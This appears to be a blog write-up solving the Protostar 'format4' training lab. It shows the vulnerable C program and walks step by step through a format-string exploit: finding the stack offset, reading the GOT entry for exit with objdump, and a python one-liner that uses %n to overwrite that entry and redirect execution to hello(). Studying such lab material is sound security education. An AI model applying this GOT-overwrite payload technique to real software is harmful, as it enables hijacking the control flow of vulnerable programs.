This is the last task of protostar format string vulnerable. I get a lot of experience from this lab. Thanks.
Description.
%p format4 looks at one method of redirecting execution in a process.
Hints
objdump -TR is your friend
This level is at /opt/protostar/bin/format4
Format4.c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int target;
void hello()
{
printf("code execution redirected! you win\n");
_exit(1);
}
void vuln()
{
char buffer[512];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
exit(1);
}
int main(int argc, char **argv)
{
vuln();
}
This task is little different with previous task. Need to call hello function to get flag. let’s try.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format4 AAAA00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.
AAAA was located on position 4.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%4$08x."')) | ./format4 AAAA41414141.
In this task, we need to exit from function and call to hello function. so need to get the address of exit. we can use objdump again.
[email protected]:/opt/protostar/bin$ objdump -TR ./format4 ./format4: file format elf32-i386 DYNAMIC SYMBOL TABLE: 00000000 w D *UND* 00000000 __gmon_start__ 00000000 DF *UND* 00000000 GLIBC_2.0 fgets 00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main 00000000 DF *UND* 00000000 GLIBC_2.0 _exit 00000000 DF *UND* 00000000 GLIBC_2.0 printf 00000000 DF *UND* 00000000 GLIBC_2.0 puts 00000000 DF *UND* 00000000 GLIBC_2.0 exit 080485ec g DO .rodata 00000004 Base _IO_stdin_used 08049730 g DO .bss 00000004 GLIBC_2.0 stdin DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 080496fc R_386_GLOB_DAT __gmon_start__ 08049730 R_386_COPY stdin 0804970c R_386_JUMP_SLOT __gmon_start__ 08049710 R_386_JUMP_SLOT fgets 08049714 R_386_JUMP_SLOT __libc_start_main 08049718 R_386_JUMP_SLOT _exit 0804971c R_386_JUMP_SLOT printf 08049720 R_386_JUMP_SLOT puts 08049724 R_386_JUMP_SLOT exit
Now,we got exit(1) address 0x08049724.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%4$08x."')) | ./format4 $�08049724.
Now we need again hello function address.
[email protected]:/opt/protostar/bin$ objdump -t ./format4 | grep hello 080484b4 g F .text 0000001e hello
calculate it.
[email protected]:/opt/protostar/bin$ let x=0x080484b4; echo $x; 134513844
and remove 4 bytes. 134513844 – 4 = 134513840
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%134513840u"+"%4$08n"')) | ./format4
Bango! We got again! Thanks for reading. Happy Hacking.